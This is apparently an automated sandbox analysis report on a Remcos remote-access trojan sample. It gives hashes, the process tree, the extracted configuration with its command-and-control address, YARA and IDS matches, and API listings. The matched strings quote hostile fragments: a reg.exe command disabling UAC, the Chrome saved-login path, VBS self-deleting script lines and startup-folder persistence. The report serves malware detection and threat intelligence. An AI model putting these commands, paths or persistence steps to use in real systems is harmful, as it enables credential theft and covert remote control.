
Windows Analysis Report
7056ZCiFdE.exe

Overview

General Information

Sample name: 7056ZCiFdE.exe
renamed because original name is a hash value
Original sample name: 6f0604f8a16b94b61d714dfec11d0358.exe
Analysis ID: 1570884
MD5: 6f0604f8a16b94b61d714dfec11d0358
SHA1: 558828c2ead68ea5883655299a3f0bfad1981ae5
SHA256: 28331e2705bf58bd76a9f8ba0f0a431b762eaf6e4284dbf12f1453dd3fecf281
Tags: exe, user-abuse_ch

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Drops VBS files to the startup folder
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Abnormal high CPU Usage
Contains functionality to read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to execute programs as a different user
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • 7056ZCiFdE.exe (PID: 6992 cmdline: "C:\Users\user\Desktop\7056ZCiFdE.exe" MD5: 6F0604F8A16B94B61D714DFEC11D0358)
    • Allene.exe (PID: 7132 cmdline: "C:\Users\user\Desktop\7056ZCiFdE.exe" MD5: 6F0604F8A16B94B61D714DFEC11D0358)
  • wscript.exe (PID: 5812 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Allene.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • Allene.exe (PID: 2872 cmdline: "C:\Users\user\AppData\Local\Milburr\Allene.exe" MD5: 6F0604F8A16B94B61D714DFEC11D0358)
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

{"Host:Port:Password": ["192.210.150.26:8787:0"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-R1T905", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": ""}
Yara Matches (dropped files)

Source | Rule | Description | Author | Strings
C:\ProgramData\remcos\logs.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security

Yara Matches (memory dumps)

Source | Rule | Description | Author | Strings
00000001.00000002.4155512160.0000000000400000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
00000001.00000002.4155512160.0000000000400000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000001.00000002.4155512160.0000000000400000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
00000001.00000002.4155512160.0000000000400000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Remcos_b296e965 | unknown | unknown
  • 0x6b6f8:$a1: Remcos restarted by watchdog!
  • 0x6bc70:$a3: %02i:%02i:%02i:%03i
00000001.00000002.4155512160.0000000000400000.00000040.00001000.00020000.00000000.sdmp | REMCOS_RAT_variants | unknown | unknown
  • 0x65994:$str_a1: C:\Windows\System32\cmd.exe
  • 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x65a04:$str_b2: Executing file:
  • 0x6683c:$str_b3: GetDirectListeningPort
  • 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x66380:$str_b7: \update.vbs
  • 0x65a2c:$str_b9: Downloaded file:
  • 0x65a18:$str_b10: Downloading file:
  • 0x65abc:$str_b12: Failed to upload file:
  • 0x66804:$str_b13: StartForward
  • 0x66824:$str_b14: StopForward
  • 0x662d8:$str_b15: fso.DeleteFile "
  • 0x6626c:$str_b16: On Error Resume Next
  • 0x66308:$str_b17: fso.DeleteFolder "
  • 0x65aac:$str_b18: Uploaded file:
  • 0x65a6c:$str_b19: Unable to delete:
  • 0x662a0:$str_b20: while fso.FileExists("
  • 0x65f49:$str_c0: [Firefox StoredLogins not found]
Yara Matches (unpacked PEs)

Source | Rule | Description | Author | Strings
4.2.Allene.exe.400000.0.raw.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
4.2.Allene.exe.400000.0.raw.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
4.2.Allene.exe.400000.0.raw.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
4.2.Allene.exe.400000.0.raw.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown
  • 0x6b6f8:$a1: Remcos restarted by watchdog!
  • 0x6bc70:$a3: %02i:%02i:%02i:%03i
4.2.Allene.exe.400000.0.raw.unpack | REMCOS_RAT_variants | unknown | unknown
  • 0x65994:$str_a1: C:\Windows\System32\cmd.exe
  • 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x65a04:$str_b2: Executing file:
  • 0x6683c:$str_b3: GetDirectListeningPort
  • 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x66380:$str_b7: \update.vbs
  • 0x65a2c:$str_b9: Downloaded file:
  • 0x65a18:$str_b10: Downloading file:
  • 0x65abc:$str_b12: Failed to upload file:
  • 0x66804:$str_b13: StartForward
  • 0x66824:$str_b14: StopForward
  • 0x662d8:$str_b15: fso.DeleteFile "
  • 0x6626c:$str_b16: On Error Resume Next
  • 0x66308:$str_b17: fso.DeleteFolder "
  • 0x65aac:$str_b18: Uploaded file:
  • 0x65a6c:$str_b19: Unable to delete:
  • 0x662a0:$str_b20: while fso.FileExists("
  • 0x65f49:$str_c0: [Firefox StoredLogins not found]

System Summary

Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Allene.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Allene.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Allene.vbs" , ProcessId: 5812, ProcessName: wscript.exe
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Allene.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Allene.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Allene.vbs" , ProcessId: 5812, ProcessName: wscript.exe

Data Obfuscation

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Users\user\AppData\Local\Milburr\Allene.exe, ProcessId: 7132, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Allene.vbs

Stealing of Sensitive Information

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Users\user\AppData\Local\Milburr\Allene.exe, ProcessId: 7132, TargetFilename: C:\ProgramData\remcos\logs.dat
Suricata IDS Alerts

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-08T09:31:26.528944+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 192.210.150.26 | 8787 | TCP


AV Detection

Source: 00000004.00000002.1920045593.0000000001948000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": ["192.210.150.26:8787:0"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-R1T905", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": ""}
Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Virustotal: Detection: 66%
Source: 7056ZCiFdE.exe | ReversingLabs: Detection: 55%
Source: 7056ZCiFdE.exe | Virustotal: Detection: 66%
Source: Yara match | File source: 4.2.Allene.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.Allene.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.Allene.exe.3920000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.Allene.exe.3920000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.Allene.exe.18b0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.Allene.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.Allene.exe.18b0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.Allene.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.4155512160.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1920045593.0000000001948000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.4156569703.00000000012B3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1919987718.00000000018B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1919363155.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.4156176304.0000000001058000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.4157121061.0000000003DDE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.4157009146.0000000003920000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.4156339648.00000000010FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Allene.exe PID: 7132, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Allene.exe PID: 2872, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.5% probability
Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Joe Sandbox ML: detected
Source: 7056ZCiFdE.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Code function: 1_2_0043293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,1_2_0043293A
Source: Allene.exe | Binary or memory string: -----BEGIN PUBLIC KEY-----

Exploits

Source: Yara match | File source: 4.2.Allene.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.Allene.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.Allene.exe.3920000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.Allene.exe.3920000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.Allene.exe.18b0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.Allene.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.Allene.exe.18b0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.Allene.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.4155512160.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1919987718.00000000018B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1919363155.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.4157009146.0000000003920000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Allene.exe PID: 7132, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Allene.exe PID: 2872, type: MEMORYSTR

Privilege Escalation

Source: C:\Users\user\AppData\Local\Milburr\Allene.exe | Code function: 1_2_00406764 _wcslen,CoGetObject,1_2_00406764
Source: 7056ZCiFdE.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Code function: 0_2_008E445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_008E445A
Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Code function: 0_2_008EC6D1 FindFirstFileW,FindClose,0_2_008EC6D1
Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Code function: 0_2_008EC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_008EC75C
Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Code function: 0_2_008EEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_008EEF95
Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Code function: 0_2_008EF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_008EF0F2
Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Code function: 0_2_008EF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_008EF3F3
Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Code function: 0_2_008E37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_008E37EF
Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Code function: 0_2_008E3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_008E3B12
Source: C:\Users\user\Desktop\7056ZCiFdE.exe | Code function: 0_2_008EBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_008EBCBC
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,1_2_0040B335
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,1_2_0041B42F
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,1_2_0040B53A
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,1_2_004089A9
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_00406AC2 FindFirstFileW,FindNextFileW,1_2_00406AC2
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,1_2_00407A8C
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,1_2_00418C69
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,1_2_00408DA7
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_0063445A GetFileAttributesW,FindFirstFileW,FindClose,1_2_0063445A
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_0063C6D1 FindFirstFileW,FindClose,1_2_0063C6D1
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_0063C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,1_2_0063C75C
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_0063EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_0063EF95
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_0063F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_0063F0F2
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_0063F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_0063F3F3
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_006337EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_006337EF
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_00633B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_00633B12
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_0063BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_0063BCBC
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,1_2_00406F06
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\
                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49730 -> 192.210.150.26:8787
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : the same alert fired for 87 further connections from 192.168.2.4 (source ports in the range 49731 - 50089) to 192.210.150.26:8787
                Source: Malware configuration extractorIPs: 192.210.150.26
                Source: Joe Sandbox ViewIP Address: 192.210.150.26
                Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008F22EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_008F22EE
                Source: Allene.exeString found in binary or memory: http://geoplugin.net/json.gp
                Source: Allene.exe, 00000001.00000002.4155512160.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Allene.exe, 00000001.00000002.4157009146.0000000003920000.00000004.00001000.00020000.00000000.sdmp, Allene.exe, 00000004.00000002.1919987718.00000000018B0000.00000004.00001000.00020000.00000000.sdmp, Allene.exe, 00000004.00000002.1919363155.0000000000400000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_004099E4 SetWindowsHookExA 0000000D,004099D0,000000001_2_004099E4
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008F4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_008F4164
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,1_2_004159C6
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_00644164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,1_2_00644164
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008F3F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_008F3F66
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_008E001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_008E001C
                Source: C:\Users\user\Desktop\7056ZCiFdE.exeCode function: 0_2_0090CABC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0090CABC
                Source: C:\Users\user\AppData\Local\Milburr\Allene.exeCode function: 1_2_0065CABC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,1_2_0065CABC
                Source: Yara matchFile source: 4.2.Allene.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.Allene.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.Allene.exe.3920000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.Allene.exe.3920000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.Allene.exe.18b0000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.Allene.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.Allene.exe.18b0000.2.unpack, type: UNPACKEDPE
